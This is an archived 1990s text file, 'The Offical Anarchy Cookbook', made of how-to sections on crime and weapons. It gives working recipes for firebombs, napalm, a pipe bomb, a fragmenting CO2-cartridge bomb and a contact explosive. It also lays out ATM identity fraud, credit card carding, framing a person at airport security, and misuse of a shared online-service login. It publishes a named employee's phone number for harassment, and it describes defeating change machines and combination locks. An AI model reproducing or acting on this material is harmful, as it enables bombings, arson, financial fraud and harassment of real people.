home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / pc / COOK2.ZIP / COOK2.TXT next >
Encoding:
Text File  |  1996-12-22  |  238.5 KB  |  5,178 lines

  1.  
  2.  
  3.                          The Offical Anarchy Cookbook
  4.  
  5.                           property of James McCarthy
  6.  
  7.                                    Airlines
  8.  
  9.   Did an airline ever lose your luggage?
  10.  
  11.   Arrange to have a friend meet you at the terminal gate when you deplane.
  12. Give your friend your baggage claim checks and have him/her retrieve your bags
  13. from the carousel, then leave the baggage area with your bags.  Before your
  14. friend leaves the airport with your luggage, be sure to get your claim checks
  15. back.  Then, you saunter over to the baggage area, spend half an hour waiting
  16. for your bags.  Ask some clerks for help, then report your "missing" luggage,
  17. showing your claim checks as proof.  Very few flights ever have a clerk
  18. actually check the baggage and collect claim checks. It's foolish, but they
  19. don't.  Make a polite, but firm scene and demand satisfaction.  Normally, the
  20. airline people will have you fill out a form and they will attempt to find
  21. your luggage.  Obviously, they won't find it.  Bug them some...write them
  22. letters.  Soon, you should get a good settlement from the airline.  Don't try
  23. to pull this one on the same airline more than once!
  24.  
  25.   Leaving the airlines and aiming for the individual mark, you can do a lot of
  26. personal damage.  For instance, if you find your mark is going to use airline
  27. travel, you could call and cancel the reservations.
  28.  
  29.   You might try to slip a couple rounds of pistol ammunition or a switchblade
  30. in to your mark's pocket just before he goes through the metal detector at the
  31. airport terminal. You could also slip some drugs into his pocket at the same
  32. time.  Read a book on pick pocketing to note the technique for doing this.
  33. It's quite easy.  Leave accurate-looking, but totally bogus hijack scenario
  34. plans, bomb diagrams, or orders of battle for terrorist attacks in airport
  35. bars and restrooms.  This fires up both the rent-a-cops and the real security
  36. people.  The security delays and resultant hassles with passengers create
  37. unhappy people who are angry at airports and airlines.  Naturally, the blame
  38. for these plans must focus on your mark.  If he has really been bugging you
  39. it's about time to get even!
  40.  
  41.  
  42.                                     Animals
  43.  
  44.     If your mark is an oily cuss with a credibility problem you should easily
  45. pull off this stunt.  It involves a cop, reporters, SPCA folks and some farm
  46. animals.  Call the police and tell them you know about a cock or dog fight
  47. that's being held at your mark's home.  Explain that you have no morals
  48. against animal fighting but you lost big money there last time and think the
  49. fights are fixed.  Next call your mark and report to him that some people
  50. are holding dog or cock fights on his property.  Call the reporters and SPCA
  51. and tell them all about the fight.  Mention that your mark and the cops have
  52. a payoff relationship.  Give everyone the same general arrival time, never be
  53. too specific.  Hopefully, all will sort of show up at the same time.  You might
  54. manipulate things so the press and animal lovers show up first.  Even if a
  55. real story doesn't develop, you have scattered some strong seeds of distrust.
  56. If you want a stronger story, find a dead dog on the road or something and
  57. plant it near by and tell the reporters and SPCA where to find the evidence.
  58. It will be fun to hear your mark and the cops talk about everything to the
  59. reporters.
  60.   ∩7Å3 
  61. è
  62.     Dead animals are very useful.  Wait until your mark goes on a trip and will
  63. be leaving his car or house empty for several days.  Get into the car
  64. or house and stuff very large and very dead animals everywhere.  Your mark will
  65. probably have to sell his car and fumigate his house when he returns.
  66.  
  67.     If you are bothered by big dogs chasing you just take a good quality
  68. plastic water pistol and fill it with freshly squeezed lemon juice.  Shoot
  69. the furball right in the eyes and it'll soon stop the canine harassment.
  70.  
  71.  
  72.                           Fun with Automatic Tellers
  73.  
  74.   Preface:  This is not a particularly easy scam to pull off, as it requires
  75. either advanced hacking techniques (TRW or banks) or serious balls (trashing a
  76. private residence or outright breaking & entering), but it can be well worth
  77. your while to the tune of $500 (five hundred) a day.
  78.  
  79.   Laws that will be broken:  Credit Fraud, Wire Fraud, Bank Fraud, Mail Fraud,
  80. Theft Over $200, Forgery, and possibly a few others in the course of setting
  81. the scheme up.
  82.  
  83.   The first step is to target your victim.  The type person you are looking
  84. for is rich.  Very rich.
  85.  
  86.   Now, don't go trying to hit on J.P. Getty or Johnny Carson or someone who
  87. carries a high name recognition.  This will just get you into trouble as
  88. everyone notices a famous person's name floating across their desk.
  89.  
  90.   Instead look for someone who owns a chain of hog feed stores or something
  91. discreet like that.  We targeted a gentleman who is quite active in the silver
  92. market, owning several mines in South Africa and not wanting this to be widely
  93. known (he had no desire to be picketed.)
  94.  
  95.   Next step, take out a p.o. box in this person's name.
  96.  
  97.   Now comes the fun part, requiring some recon on your part.  You need
  98. to know some fairly serious details about this person's bank dealings.
  99.  
  100.         1)  Find out what bank he deals with mainly.  This isn't too difficult
  101.             as a quick run through his office trash will usually let you find
  102.             deposit carbons, withdrawal receipts, or *anything* that has the
  103.             bank name on it.
  104.  
  105.         2)  Find out the account number(s) that he has at the bank.  This can
  106.             usually be found on the above-mentioned receipts.  If not, you can
  107.             get them in TRW (easier said than done) or you can con them out of
  108.             a hassled bank teller over the phone (Use your imagination.  Talk
  109.             slowly and understandingly and give plausible excuses ["I work for
  110.             his car dealership, we need to do a transfer into his account"].)
  111.  
  112.         2a) [optional]  If you can, find out if he has an ATM (Automatic
  113.             Teller) card.  You don't need to know numbers or anything, just
  114.             if a card exists.  This can also be ascertained over the phone
  115.             if you cajole properly.  ∩7Å3 
  116. è
  117.         3)  Armed with this information, go into action.
  118.  
  119.                 a) Obtain some nice (ivory quality) stationary.  It doesn't
  120.                    have to be engraved or anything, but a $5 or $10 investment
  121.                    to put a letterhead with his initials or something on it
  122.                    couldn't hurt.  But the most important thing is that it
  123.                    look good.
  124.  
  125.                 b) Type a nice letter to the bank notifying them of your
  126.                    address change.  Some banks have forms you have to fill out
  127.                    for that sort of thing, so you need to check with the bank
  128.                    first (anonymously, of course).  You will have to have a
  129.                    good copy of his signature on hand to sign all forms and
  130.                    letters (again, trash his office).
  131.  
  132.                 c) Call the bank to verify the new address.
  133.  
  134.                 d) IMMEDIATELY upon verifying the change of address, send a
  135.                    second letter.  If he already has an ATM card, request a
  136.                    second card with the business name engraved in it be sent
  137.                    for company use.  If he doesn't have an ATM card, the
  138.                    letter should request one for account number xxxxxx.  Ask
  139.                    for two cards, one with the wife's name, to add
  140.                    authenticity.
  141.  
  142.                 e) Go to the bank and ask for a list of all ATM's on the
  143.                    bank's network.  Often the state has laws requiring *all*
  144.                    machines take *all* cards, so you'll probably be in good
  145.                    shape.
  146.  
  147.                 f) Await the arrival of your new card.  The PIN (personal
  148.                    identification number) is included when they send out a
  149.                    card.  After picking up the card, forget that you ever
  150.                    even *knew* where the p.o. box was, and make sure you
  151.                    didn't leave fingerprints.
  152.  
  153.                 g) Begin making the maximum daily withdrawal on the card
  154.                    (in most cases $500/day), using a different machine each
  155.                    time.  Since many of these machines have cameras on them,
  156.                    wear a hat & jacket, or a ski mask to be really paranoid.
  157.                    To cut the number of trips you have to make in half, be at
  158.                    an ATM a few minutes before midnight.  Make one $500
  159.                    withdrawal right before midnight, and another one right
  160.                    after.  This cuts down on the number of trips, but police
  161.                    or bank officials may spot the pattern and start watching
  162.                    machines around midnight.  Use your own judgement.
  163.  
  164.  
  165.   Conclusion: Before using the card, make sure that all fingerprints are wiped
  166. from it.  Usually the first hint you will have that they have caught on to
  167. your scam is that the machine will keep the card.  Also, avoid using machines
  168. in your own town unless it is a big city (Chicago, Milwaukee, Dallas,
  169. etc...). 
  170.   ∩7Å3 
  171. è                                     Bombs
  172.  
  173.                                    FIREBOMBS
  174.  
  175.      Most fire bombs are simply gasoline filled bottles with a fuel soaked
  176. rag in the bottle's mouth. The original Molotov cocktail, and still about the
  177. best, was a mixture of one part gasoline and one part motor oil. The oil helps
  178. it to cling to what it splatters on.
  179.  
  180.                                     NAPALM
  181.  
  182.      About the best fire bomb is napalm. It has a thick consistency, like
  183. jam and is best for use on vehicles or buildings.
  184.  
  185.      Napalm is simply one part gasoline and one part soap. The soap is
  186. either soap flakes or shredded bar soap. Detergents won't do.
  187.  
  188.      The gasoline must be heated in order for the soap to melt. The usual
  189. way is with a double boiler where the top part has at least a two-quart
  190. capacity. The water in the bottom part is brought to a boil and the double
  191. boiler is taken from the stove and carried to where there is no flame.
  192.  
  193.       Then one part, by volume, of gasoline is put in the top part and
  194. allowed to heat as much as it will and the soap is added and the mess is
  195. stirred until it thickens. A better way to heat gasoline is to fill a bath
  196. tub with water as hot as you can get it. It will hold its heat longer and
  197. permit a much larger container than will the double boiler.
  198.  
  199.  
  200.                                 MATCH HEAD BOMB
  201.  
  202.      Simple safety match heads in a pipe, capped at both ends, make a
  203. devastating bomb. It is set off with a regular fuse.
  204.  
  205.      A plastic Baggie is put into the pipe before the heads go in to prevent
  206. detonation by contact with the metal.
  207.  
  208.  
  209.                             FUSE IGNITION FIRE BOMB
  210.  
  211.      A four strand home made fuse is used for this. It burns like fury.  It
  212. is held down and concealed by a strip of bent tin cut from a can.  The
  213. exposed end of the fuse is dipped into the flare igniter. To use this one,
  214. you light the fuse and hold the fire bomb until the fuse has burned out of
  215. sight under the tin. Then throw it and when it breaks, the burning fuse will
  216. ignite the contents.
  217.  
  218.  
  219.                                      Bomb 2
  220.                                  The Destructor
  221.  
  222. Materials:
  223.  
  224. 1 CO2 Cartridge - Used in BB guns - come in a pack of five - Target sells them
  225.                   for $1.50 a pack.  ∩7Å3 
  226. è2 Size D Estes model rocket ines - found in most hobby stores where model
  227.                                       rockets are sold. (Any size will work but
  228.                                       D's have the most powder)
  229. 2 Solar igniters - usually come with the engines - used to ignite the bomb
  230. 1 Bottle of fast drying model glue
  231. 1 Scissors
  232. 1 Funnel
  233. 1 roll of masking tape
  234. 1 hammer
  235. 1 container (jar, cup, glass)
  236. 1 20 foot wire (+ and -)
  237. 1 6 volt (or 12 volt) lantern battery
  238.  
  239.  
  240. Procedure:
  241.  
  242.   The CO2 cartridge is the body of the bomb and when it explodes will fragment
  243. .. so stand back..  Metal flies!!
  244.  
  245.   If you have a CO2 BB gun then you will have many empty cartridges. For those
  246. of you who have never bought CO2 cartridges you will have to find some other
  247. way of emptying them. I have done this on accident before, simply insert a nail
  248. in the top of the cartridge and watch the CO2 gas come out!! Very cold if you
  249. let it touch you. I do not suggest doing it this way, so if possible, ask a
  250. friend who has a CO2 BB gun for their empty CO2 cartridges.
  251.  
  252. Make the hole bigger:
  253.  
  254.   Once you have an empty cartridge you have to make the hole bigger, otherwise
  255. it is very difficult to get the explosive compounds into the cartridge. Take a
  256. nail and pound the hole bigger. The size of the hole is very important. If it
  257. is too big the cartridge will act as a rocket instead of a bomb.
  258.  
  259. Prepare the explosive ingredients:
  260.  
  261.   Unroll the model rocket engines with a pocket knife, until you have the black
  262. chunk of boosting compound. Throw away the unrolling paper. You may remove the
  263. block of clay since this is not explosive. Powder the chunk with the hammer
  264. until you have fine powder. To make the fine powder, lay down some wax paper
  265. on the floor. Find a screen mesh, and filter the powder, leaving the big pieces
  266. on top and the fine powder on the wax paper. Then pour the powder on the wax
  267. paper into a container. After you have the two size D engines powdered and in
  268. the container you are ready to put the powder into the CO2 cartridge.
  269.  
  270. Get the ingredients in the cartridge:
  271.  
  272.   Make a funnel out of paper (a floppy disk jacket works well, with the end
  273. clipped off) and tape it around the end of the cartridge. Slowly pour the
  274. powder from the container into the funnel. You may have to use a toothpick to
  275. help the powder through the funnel and into the cartridge. If your powder is
  276. not fine enough it might jam in the hole and you will have to remove the funnel
  277. and clear the passage. Shake the cartridge every so often until you can't hear
  278. the powder in there. The cartridge is now full of explosive powder.
  279.  
  280. Prepare the igniter:
  281.   ∩7Å3 
  282. è  Clip the paper protector of the igniter with a scissors and b the wires so
  283. they are relatively straight. (Be careful not to break the igniter when bending
  284. the wires) Coat the igniter with glue except for the ends, and let it dry for a
  285. few minutes. Then insert the igniter into the cartridge leaving the ends
  286. exposed. The tip of the igniter must touch the powder for the powder to ignite.
  287. This should be no problem if you have enough powder in the cartridge. Put glue
  288. around the igniter and the tip of the cartridge and let dry.
  289.  
  290. Connecting the bomb:
  291.  
  292.   Then bend the end wires of the igniter and connect to your 20 foot wire.
  293. Put tape around the end wires and cartridge. The Destructor is now ready to
  294. detonate.
  295.  
  296. Detonating the bomb:
  297.  
  298.   When you have found a place to detonate The Destructor, stretch the
  299. wire the full 20 feet and then touch both wires to the two negative and
  300. positive connectors. This will send a 6 volt charge through the wire and to the
  301. igniter.  The igniter will ignite the explosive compounds in the cartridge and
  302. in a matter of seconds........   BOOM!!!!!!!!!!!!!!
  303.  
  304.  
  305.                                  Basic Carding
  306.  
  307.    INTRODUCTION:
  308.      This is an attempt to tutor individuals lacking in the knowledge
  309.  of how to get items from stores without actually paying for them and
  310.  not having to show up in person.  Instead, charge them to someone
  311.  else's credit card (also known as 'CC') account.  This process is
  312.  known as 'credit carding' or just 'carding' amongst people in that
  313.  field of acquiring goods.
  314.  
  315.  STEP I:
  316.  ------
  317.    ACQUIRING CREDIT CARD INFORMATION:
  318.      The first and foremost thing to do is acquire CC information.
  319.  The things that are necessary are:  name of the card holder,
  320.  expiration date, account number, and the CC type. (that is: Visa,
  321.  American Express, MasterCard, etc.)
  322.  
  323.    WHAT TO LOOK FOR:
  324.      In order to get these important bits of information, you would
  325.  have to know where to look.  The cards themselves have all of this
  326.  information right on them.  However, an easier and better place to
  327.  find these things is on the carbons that stores use to put the info.
  328.  on the different sheets to give to The CC company, themselves or
  329.  their bookkeeper, and the customer himself.  On these carbons, it
  330.  should be pretty obvious as to which is which.
  331.  
  332.    HOW-TO GET CARBONS:
  333.      The best way to get the carbons is by rooting through the trash
  334.  cans (or dumpster(s)) of a store.  This process is known as
  335.  'trashing'.  The best places to trash depends on the time of the
  336.  year in which you are looking for the carbons.  For instance, during  ∩7Å3
  337. è the Christmas season: toy stores, during major season (temperature)
  338.  changes: clothing stores, etc.  Basically, go wherever there is the
  339.  largest buying attraction during that period of time.  Whenever,
  340.  there is no major buying attraction, try independent clothing stores
  341.  or department stores.
  342.  
  343.    TRASHING CLOTHES:
  344.      I suggest that you wear some really grubby, old, etc. clothing
  345.  when you go trashing, because you never know what some of these
  346.  stores are gonna throw away.  If you are kind sqeemish, wear rubber
  347.  gloves and those pant covers that farmers use, I am not sure what
  348.  they are called, but they're made of rubber and will keep the
  349.  nasties away from you when you go trashing.
  350.  
  351.    CARBONS:
  352.      After you have gotten a considerable number (30 - 500) of
  353.  carbons, you need to identify the proper parts of the carbon. The
  354.  important parts of the carbon will look like Diagram 1 does.
  355.  
  356.                        D i a g r a m   1
  357.  +------------------------------------------------------------+
  358.  |  Account Number  exp date(1)                               |
  359.  |  exp date(2)     exp date(3)                               |
  360.  |  Card holder's name                                        |
  361.  |                                                            |
  362.  |                                                            |
  363.  |                                                            |
  364.  |                                                            |
  365.  |                                                            |
  366.  +------------------------------------------------------------+
  367.  
  368.    CARD HOLDER'S NAME:  (SEE DIAG. 1)
  369.      The card holder's name should be quite clear on all carbons
  370.  that you find in the same place as on diagram one.  If it is not
  371.  there, it should be easy to distinguish from any other information
  372.  on the carbon.
  373.  
  374.    EXP. DATES:  (SEE DIAG. 1)
  375.      The expiration dates can be in two forms.  The forms are
  376.  thus:  XX/XX THRU XX/XX which would be found on exp date(2) and
  377.  is used on American Express cards, and XX-XX which is found in
  378.  either exp date(1) or exp date(3) and is for either VISA or
  379.  MasterCard.
  380.  
  381.     ACCOUNT NUMBER: (SEE DIAG. 1)
  382.       Account numbers are generally found in the top, left-hand
  383.  corner of the carbon.  They can be found in other places, but that
  384.  is the most common.
  385.  
  386.     CARD TYPE:
  387.       The formats of account numbers are quite varied between CC
  388.  companies. Diagram 2 shows which major card types use which
  389.  formats. You can use diagram two, or a reasonable facsimile, for
  390.  identification of CC types on your carbons.  If the number is not
  391.  of any of these formats, discard that carbon, for it'd not be of a  ∩7Å3 è major accepted gender.
  392.  
  393.                           D i a g r a m   2
  394.            +----------------------=----------------------+
  395.            | CC type              | Format of the act. # |
  396.            +----------------------=----------------------+
  397.            | American Express     | XXXX XXXXXX XXXXX    |
  398.            | MasterCard           | XXXX XXXX XXXX XXXX  |
  399.            | Revolv-a-charge      | NXXN XXXX NXXXXX X   |
  400.            | Visa                 | XXXX XXX XXX XXX     |
  401.            +----------------------=----------------------+
  402.                                     X represents a number
  403.                                     N represents a letter
  404.  
  405.  STEP II:
  406.  -------
  407.     THE DROP SPOT:
  408.       Before you order your merchandise, you must figure out a place
  409.  to send the merchandise.  You do ** NOT **  want the store from
  410.  which you shop, the card holder, or the CC company to know where you
  411.  really live.
  412.  
  413.     QUALIFICATIONS:
  414.       In order for a house to qualify as an inconspicuous drop spot,
  415.  it must meet several requirements.  It must look like a place where
  416.  people could really live and be getting things sent through UPS to
  417.  them.  It must be a place that the owners will not 'visit' too
  418.  regularly.  It may have a 'FOR SALE' sign in front of it, but it is
  419.  better if it doesn't.  And most important of all, it must be a place
  420.  that you can check up on often. Make sure you WRITE DOWN the address
  421.  in a place where you will NOT forget it and where it will be readily
  422.  accessible when you are ordering merchandise. (SEE STEP III)
  423.  
  424.  STEP III:
  425.  --------
  426.     ORDERING MERCHANDISE:
  427.       If you have a catalog or something that you are ordering from,
  428.  then follow the directions given in the book for making phone
  429.  orders.  Make sure the address given is the drop spot's address,
  430.  and NOT yours.  If your voice doesn't sound mature enough to be an
  431.  adults, the order-taker might be suspicious.  There are two ways to
  432.  solve this.  The first is to tell the order taker that you are
  433.  doing this for your parents 'cause they are too busy to order it,
  434.  so they made you do it.  This is risky.  The second and better one
  435.  is to have someone else order it (WHILE YOU WATCH HIM/HER!) for
  436.  you.  The person that does this should be VERY trustworthy. Be sure
  437.  to know the expected time of delivery. (SEE STEP IV)
  438.  
  439.  STEP IV:
  440.  -------
  441.      THE PICK-UP:
  442.        You should leave a little note inside the front door or
  443.  hanging in some place that even the dumbest UPS driver could see.
  444.  This note should be typed or printed and give directions as to
  445.  where to leave the package(s).  Things like the back porch or under  ∩7Å3
  446. è a tarpaulin or in a box on the front porch usually work best.  And
  447.  say something to the effect of each family member working and that
  448.  you have a tight schedule and anything other than leaving it where
  449.  mentioned would be very inconvenient for you.  You then approach
  450.  the building every other night starting the day after the expected
  451.  delivery to get your 'present'.
  452.  
  453.  
  454.  
  455.                                  Credit Checks
  456.  
  457.      When you somehow obtain a card, before you order something, you must first
  458. check the card to see if it is good.  Here is how to do that:
  459.  
  460.  Dial:  1-800-554-2265
  461.  
  462.  10# - Mastercard
  463.  20# - Visa
  464.  1067# - Auth. #
  465.  51# -Merchant Number
  466.  
  467.  CC number + # - when asked for card number
  468.  MMYY + # - When asked for exp. date
  469.  Dolars+*+Cents+# - When asked for amount
  470.  
  471.     Now, here is what you must do to check the limit of the card.  Call up and
  472. enter all the card stuff and when it says amount start at 5000*00#, and it will
  473. almost ALWAYS say declined, unless it is a Preferred or Gold card. From them
  474. on, go down in $1000 increments until it says approved and gives you an auth.
  475. number to write on the customers receipt. Then enter $500, it should say
  476. declined, if it doesn't and says approved, check it for 500 again, then it will
  477. say declined.
  478.  
  479.  
  480.  
  481.                                    Cherry Bomb
  482.  
  483. Materials:
  484.  
  485.  1. Ping pong ball.
  486.  2. Black powder.
  487.  3. Fuse, at least 5 in.
  488.  4. Nail polish.
  489.  5. Any type of tape.
  490.  
  491. Procedure:
  492.  
  493.  1. Use an ice pick to poke a hole in the ping pong ball, then use a razor
  494.     blade to make a big enough hole to put the black powder in.
  495.  2. Place the black powder in. Probably 3/4 full is best.
  496.  3. Now, insert the fuse into the ice pick hole.
  497.  4. Cover the entire ball with nail polish. This is used to make it louder.
  498.  5. Finally, cover the whole thing with tape, also used for loudness.
  499.  
  500.   ∩7Å3 
  501. è
  502.                     Hacking the Compuserve Infomation Service
  503.  
  504.     Compuserve is a multiuser networked Pay by Hour service. But this can
  505.     be beat. At current rates, CIS (Compuserve) charges $6.50 for 300 baud
  506.     and $12.75 for 1200/2400 baud, 9600 can only be accessed by Hardwired
  507.     clients. Thus you see the need for this file. At the time this was
  508.     written, all information in this file was correct. Enough of this, on
  509.     to the file.
  510.  
  511.     Logging on to Compuserve
  512.     ------------------------
  513.     In order to logon to CIS you need one of the following.
  514.      1) A Telenet, Tymnet, Or CIS Port
  515.      2) A Credit Card
  516.      3) Above the IQ of a houseplant
  517.     That is all you need, I know for some of you the 3rd one is tough, but
  518.     try. Ok, you have all this, call your local port, logon to CIS, then
  519.     you should get a [User ID:] Prompt, type [177000,5000], this is the Ziff
  520.     PCMagnet User Id. Now, if you entered it correctly, then you should get
  521.     the [Password:] Prompt, at This type [Pc*Magnet]. You will next be given
  522.     a Welcome Message, then, you will get yet another Prompt. It should ask
  523.     you for your Agreement Number, type [Z10D8810]. That is the end of the
  524.     prompts. Here's where the IQ of above a houseplant comes into play.
  525.     You now have to think. It will ask you various questions, ranging from
  526.     your country to your Social Security number. Answer them however you
  527.     want, but I wouldn't use your real info. If you want the second password
  528.     (Needed to access some things), you will have to give an address where
  529.     you can drop by and pick it up. Some ideas are sending to your neighbors,
  530.     but use your last name, it will end up at your house. This is safe, I
  531.     have used it. Or you can rent a Post Office box for about 6 months.
  532.     Once you have done all this, and answer the questions, and read the
  533.     propoganda, you will see [Entering PCMagnet]. You are done.
  534.  
  535.     So what do I do Now?
  536.     --------------------
  537.     Ok, if you get this far, you have the IQ of above your fern. You can
  538.     go one of two places, CIS or PCMagnet (Where you are now). You can
  539.     stay in PCMagnet, but there isn't much there. So, I would type [Go Cis]
  540.     This will bring you to Compuserve. Once on CIS, you can do many thing,
  541.     ranging from downloading files, to real time chat on forums to online
  542.     games. Next, I will list some interesting places to go.
  543.  
  544.     Where do I go?
  545.     --------------
  546.     There are alot on interesting places to go on Compuserve. There are
  547.     some places that you can't access without a second password, so that
  548.     must be attained to get on CB. But you can goto the forums, the
  549.     games, and alot of other things. I will list some places that I like
  550.     to go.
  551.      [Go Rocknet] will bring you to a rather nice forum that is populated
  552.                   by some very nice people. It has confrences at 7am till
  553.                   9am (Breakfast Club), at 12pm till 1pm (Lunch Bunch),
  554.                   and from around 10pm till 1am. I can be found in this
  555.                   forum alot.  ∩7Å3 
  556. è     [Go Hsx100]  will bring you the Human Sexuality Forum, but it's
  557.                   not what you think, they are very interesting people
  558.                   that hang around here. The Confrence's there are from
  559.                   around 10pm till about 4am. They last along time.
  560.     These are just my favorites, but if you type [Go Forums], it will
  561.     give you a list of forums that you can Hang around on. There are
  562.     some things to look out for on CIS.
  563.  
  564.     Some sights you will see
  565.     ------------------------
  566.     There are some things to look out for on CIS. You must be careful
  567.     when you see one of these things. They are on the look out for US.
  568.     If you see a [70000,xxxx] id, that is a Security Officer, they will
  569.     deleate you if you are not careful. If you see a [70006,xxxx] that
  570.     is a Wizard, he can also deleate you. They some times do not deleate
  571.     you they just /gag you, that means you can't be seen, you are not in
  572.     the userlist. This only applys to Confrence and CB. *LooLoo* is a
  573.     person to be careful not to see, she is a mother fucker. She is a
  574.     powerful person, she can /gag you on any forum, but SHE CAN NOT
  575.     deleate you, only a security account can. Her user id is [70006,522]
  576.     so if you see that ID, be careful. I have talked to her voice on
  577.     several occassions, she is fun to call and bother about CIS, if you
  578.     want her number, it is [614/764-2302] Her real name is Patricia
  579.     Phelps. There is also another not so nice person on Compuserve , he
  580.     is Dan Piskur, he is the Head of Security. He uses the Handles,
  581.     [Dan'l or Ghost] he CAN deleate you on sight.
  582.  
  583.     Misc Info.
  584.     ----------
  585.     Here's come info on Project Numbers. (User Id's)
  586.     70000,xxxx = CIS Security     70003,xxxx = CIS Employe
  587.     70004,xxxx = CIS Employe      70005,xxxx = Radio Shack Demo
  588.     70006,xxxx = Wizard           70007,xxxx = Complementary Account
  589.     76701,xxxx = Forum Sysop      76703,xxxx = Forum Sysop
  590.     76704,xxxx = Forum Sysop      72251,xxxx = Ziff Account (You)
  591.     72261,xxxx = Ziff Account     72271,xxxx = Ziff Account
  592.     72301,xxxx = Ziff Account
  593.     Some things, a Wizard is a very powerful person, they have access
  594.     to /gag you. A Ziff account is an account created by this method.
  595.  
  596.  
  597.  
  598.                              Change Machine Fraud
  599.  
  600.  I.
  601.    There are certain types of money changing machines...The one YOU need is
  602. the kind where ya put yer bill in the tray <lengthwise> ,push the tray in to
  603. get yer change...
  604.  
  605.  II.
  606.    Once you got the right machine,get a $5 or a $1 ,it helps if the bill is
  607. WRINKLED...Then tear a notch in the bill on the lower left side of the bill.
  608. Cut the notch about 3.5 cm. from the lower left hand corner...
  609.  
  610. III.  ∩7Å3 
  611. è    Now, go to the machine..put the bill in the tray and sl it in...  Now
  612. what will happen is the machine will have so far read the bill right and it
  613. will spit out yer change..  Then when it reads the notch, it will think the
  614. bill is fucked up and reject it  and like you will have the change  and yer
  615. bill...
  616.  
  617.  For this to werk right you must have done this right..it does take practice
  618. but once you can do this your local Money Changer will be yer bank...
  619.  
  620.  
  621.  
  622.  
  623.  
  624.                       How to Pick Master Combination Locks
  625.  
  626.  
  627.  
  628.     1st number:
  629.  
  630.               Get out any of the Master locks so you know what's going on.  The
  631.               handle part (the part that springs open when you get the
  632.               combination), pull on it, but not enough so that the knob won't
  633.               move.  While pulling on it turn the knob to the left until it
  634.               won't move any more. Then add 5 to this number. Congradulations,
  635.               you now have the 1st number.
  636.  
  637.     2nd number:
  638.  
  639.               Ok, spin the dial around a couple of times, then go to the 1st
  640.               number you got, then turn it to the right, bypassing the 1st
  641.               number once. WHEN you have bypassed. Start pulling the handle and
  642.               turning it.  It will eventually fall into the groove and lock.
  643.               While in the groove pull on it and turn the knob. If it is loose
  644.               go to the next groove; if it's stiff you got the second number.
  645.  
  646.     3rd number:
  647.  
  648.               After getting the 2nd, spin the dial, then enter the 2 numbers,
  649.               then after the 2nd, go to the right and at all the numbers pull
  650.               on it.  The lock will eventually open if you did it right. If
  651.               can't do it the first time, be patient, it takes time.
  652.  
  653.  
  654.  
  655.                        Preparation of Contact Explosives
  656.  
  657.   The contact explosives we will be describing use only a few chemicals. Some
  658. do need extra caution to keep from causing trouble.
  659.  
  660. Iodine Crystals
  661.  
  662.   Though most people don't realize it, Iodine is not a brown liquid, but a
  663. steel-grey solid. The tincture of iodine you buy at the drugstore actually
  664. contains just a tiny bit of iodine dissolved in a jarful of inexpensive
  665. alcohol, and resold at a huge mark up. We'll be using iodine in the crystalline  ∩7Å3 
  666. èform. On contact with your skin, it will produce a dark stain that won't wash
  667. off with soap and water. We'll talk about removing these stains later. If it
  668. gets hot, it vaporizes into a purple cloud, that smells like the chlorine in a
  669. swimming pool. This cloud is dangerous to inhale, since it will condense in
  670. your lungs, and is corrosive. Since we won't need to heat this stuff, it is not
  671. a problem, but you should make sure that you don't let any iodine crystals
  672. spill onto a hot surface. If you don't touch it and keep it away from your
  673. face, you shouldn't have any troubles.
  674.  
  675. Ammonium Hydroxide
  676.  
  677.   This is just good old household ammonia. Be sure to get the clear kind. The
  678. sudsy stuff won't be too useful. It is made from ammonia gas dissolved in
  679. water, and every time you open the bottle, it loses some of its strength, so be
  680. sure to use fresh stuff. We need it to be as strong as possible. Some of the
  681. formulas given here use lab grade concentrated ammonium hydroxide. It is much
  682. stronger than the supermarket kind, and is very unkind to skin or especially
  683. the eyes. It is a good idea to wear eye protection with even the supermarket
  684. grade. Though we don't usually worry about this when using household ammonia
  685. for cleaning, we usually dilute it for that. Here we'll be using it straight
  686. out of the bottle, and it is much more corrosive in that form. Never use this
  687. material if you don't have real good ventilation, as the ammonia vapors can be
  688. overpowering.
  689.  
  690. Potassium Iodide
  691.  
  692.   This is a reasonably safe chemical. You get Potassium ions in some of the
  693. fruit you eat, and Iodide ions (usually as Sodium Iodide) are added to the
  694. table salt you buy at the store. So, while you don't directly eat this
  695. chemical, you do eat the components that make it up. Don't be scared of this
  696. stuff.
  697.  
  698.  
  699. Sodium Thiosulfate
  700.  
  701.   Otherwise known as photographic hypo. When dissolved in water, this will
  702. remove the iodine stains left by touching iodine crystals, and exploding
  703. contact explosive. Not particularly nasty stuff, but make sure to wash it off
  704. after cleaning yourself with it.
  705.  
  706.                            General Information
  707.  
  708.   This is a powerful and highly sensitive explosive. A dust sized particle will
  709. make a sharp crack or popping sound. A piece the size of a pencil lead will
  710. produce an explosion as loud as any of the largest firecrackers or cherry
  711. bombs.  It cannot be exploded by any means when wet, and therefore can be
  712. handled and applied with safety. When dry, it will explode with the touch of a
  713. feather, or a breath of air.
  714.  
  715.   The strength of the ammonia water you use will have a direct effect on the
  716. strength of the final product. If you use supermarket ammonia, the explosive
  717. will work, but not as spectacularly as if you use a 15% or higher (10 to 15
  718. molar) solution. The stronger it is, the better. You'll also need filter paper,
  719. and a funnel. A properly folded coffee filter will do nicely if you don't have
  720. the filter paper. If you're not sure how to fold filter paper, check an  ∩7Å3 
  721. èelementary chemistry textbook.
  722.  
  723.                           Methods of Preparation
  724.  
  725. 1.) Granular Explosive. This is the easiest kind, and the only kind that will
  726. work reasonably well with supermarket ammonia. Crush enough iodine crystals to
  727. make a pile of powder equal to the volume of a pencil eraser. Do not grind into
  728. a fine powder. Put about 4 ounces or 1/2 measuring cup of strong ammonia water
  729. into a small container with the iodine, and seal it for about 5 to 10 minutes,
  730. shaking frequently. While the mixture is reacting, get your filter paper ready.
  731. While it is best to consult a book that shows how to do this, you take the
  732. circle of filter paper, fold it in half, fold it again at right angles to the
  733. first fold, and then open it to form a cone. Open or close it as needed to make
  734. it conform to the angle of the funnel, and moisten it a little to make it stick
  735. in place. Place the funnel over a container that will catch the waste liquid.
  736. Let the mixture settle long enough for the sediment to settle, and pour off as
  737. much of the clear liquid as possible before filtering the sediment. Pour the
  738. remaining liquid and sediment into the filter. The sediment (and the filter
  739. paper covered with it!!!) is your explosive. The small amount you have made
  740. will go a lot farther than you realize. Particularly if you used good strong
  741. ammonia. Place the explosive in an airtight leakproof pill bottle. As this
  742. explosive is unstable by nature, fresh amounts give better results than stale
  743. ones that have been sitting around for a day or so. Best results are obtained
  744. with small fresh batches. But as you'll see, there are a few tricks you can do
  745. with this material that do require it to sit for a day or more.
  746.  
  747. The explosive should be stored and applied while wet.
  748.  
